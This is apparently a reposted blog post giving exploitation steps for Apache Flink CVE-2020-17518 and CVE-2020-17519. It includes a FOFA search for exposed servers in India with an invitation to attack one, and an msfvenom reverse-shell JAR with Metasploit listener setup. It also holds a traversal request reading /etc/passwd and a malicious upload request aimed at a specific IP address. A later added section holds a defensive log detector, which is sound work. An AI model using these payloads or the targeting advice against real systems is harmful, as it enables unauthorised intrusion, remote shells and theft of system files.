Apache Flink CVE-2020-17519

Search FOFA for Apache Flink

app="APACHE-Flink" &&country="IN"

Unauthenticated arbitrary JAR upload leads to remote code execution; find a site in India to try it on.

1: Upload the generated JAR

msfvenom -p java/meterpreter/reverse_tcp LHOST=ip LPORT=4568 -f jar > main.jar

After uploading the JAR, listen on the port:
use exploit/multi/handler
set payload java/shell/reverse_tcp
set lhost ip
set lport 4568
run

2: CVE-2020-17519

Arbitrary file read; just request the path directly.
Poc: /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

3: CVE-2020-17518

Construct the request and send it:

POST /jars/upload HTTP/1.1
Host: 159.89.171.110:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 06 Jan 2021 03:23:18 GMT
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 185
------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"
success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--

Then request http:/ip/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fsucccess

This did not succeed here; the version may be wrong.

Affected versions: Apache Flink 1.11.0, 1.11.1, 1.11.2
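
A defender-side check for the two request patterns shown above, as an added example that is not part of the original post: it percent-decodes request paths repeatedly (so %252f is normalised to /) and flags /jobmanager/logs/ requests containing a ".." segment, and it flags multipart filename values in a /jars/upload body that leave the upload directory. The access-log format, the sample lines and all function names are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (assumed combined-log style, not from the page).
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Jan/2021:03:23:18 +0000] "GET /jobmanager/logs/..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1024',
    '203.0.113.5 - - [06/Jan/2021:03:24:02 +0000] "GET /jobmanager/logs/ HTTP/1.1" 200 312',
    '198.51.100.7 - - [06/Jan/2021:03:25:40 +0000] "GET /jobmanager/logs/flink-jobmanager.log HTTP/1.1" 200 2048',
    '198.51.100.7 - - [06/Jan/2021:03:26:11 +0000] "GET /jobmanager/logs/%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 404 0',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
FILENAME_RE = re.compile(r'filename="(?P<name>[^"]*)"', re.IGNORECASE)


def fully_decode(value, max_rounds=5):
    """Percent-decode until stable, so %252f -> %2f -> / is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def has_traversal(value):
    """True if the fully decoded value contains a '..' path segment."""
    return '..' in re.split(r'[/\\]', fully_decode(value))


def suspicious_log_reads(lines):
    """Return log lines that request /jobmanager/logs/ with a traversal segment."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and m['path'].startswith('/jobmanager/logs/') and has_traversal(m['path']):
            hits.append(line)
    return hits


def suspicious_upload_filenames(body):
    """Return multipart filename values that would escape the upload directory."""
    names = FILENAME_RE.findall(body)
    return [n for n in names if has_traversal(n) or n.startswith('/')]


if __name__ == '__main__':
    for hit in suspicious_log_reads(SAMPLE_LOG):
        print('ALERT', hit)
```
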


Reposted from blog.csdn.net/weixin_45682070/article/details/113643867